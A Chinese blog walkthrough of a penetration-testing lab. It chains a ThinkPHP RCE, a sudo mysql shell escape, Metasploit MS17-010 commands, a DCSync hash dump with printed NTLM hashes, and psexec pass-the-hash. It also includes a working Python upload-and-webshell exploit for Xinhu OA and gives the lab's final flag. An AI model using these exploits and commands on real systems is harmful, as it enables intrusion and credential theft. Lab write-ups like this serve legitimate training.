Logo
Overview

渗透记录:春秋云镜 Initial

April 12, 2025
技术 CTF

用时50min

这个月不做了, 生活费干没了😭

公网 (flag1)

看图标是个Thinkphp。扫一下直接打5023rce。

传马,连antsword。

进去权限不够,搜了下,sudo可以用。

sudo -l 看下:sql提权 

sudo mysql -e '\! command'

上meterpreter,root权限

然后第一部分flag

ms17_010 + 域控 + pth(flag3)

🤔

还真别说,在学校内网里我也扫到了好几台有永恒之蓝洞的主机

进去fscan扫到1.21是17010, msf一把梭了。

但是这个确实很难一次成功,非常好网络环境。 

search ms17_010
use 0
set RHOSTS 172.22.1.21
set payload windows/x64/meterpreter/bind_tcp_uuid
run

是system,然后刚好是dc。所以dump hash,然后可以pth到另一台直接连了。 

load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502	krbtgt	fb812eea13a18b7fcdb8e6d67ddc205b	514
1106	Marcus	e07510a4284b3c97c8e7dee970918c5c	512
1107	Charles	f6a9881cd5ae709abb4ac9ab87f24617	512
1000	DC01$	4910530c38fa8109f5ad479b16000942	532480
500	Administrator	10cf89a850fb1cdbe6bb432b859164c8	512
1104	XIAORANG-OA01$	375287d4671ca0a03d584590775c2823	4096
1108	XIAORANG-WIN7$	fbafe1571e1012b1f6fc93c363275b97	4096

于是走impacket的psexec 

proxychains4 -q python examples/psexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/administrator@172.22.1.2 -codec gbk

信呼协同办公系统

是个nday。配好代理,上传一个马,antsword连上 

import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

这个甚至不用提权,很好啊

EOF

完整flag

flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

确实挺入门的一个题,有渗透,横向移动的内容,非常适合新手,也挺有意思的。

comment

留言 / 评论

如果暂时没有看到评论,请点击下方按钮重新加载。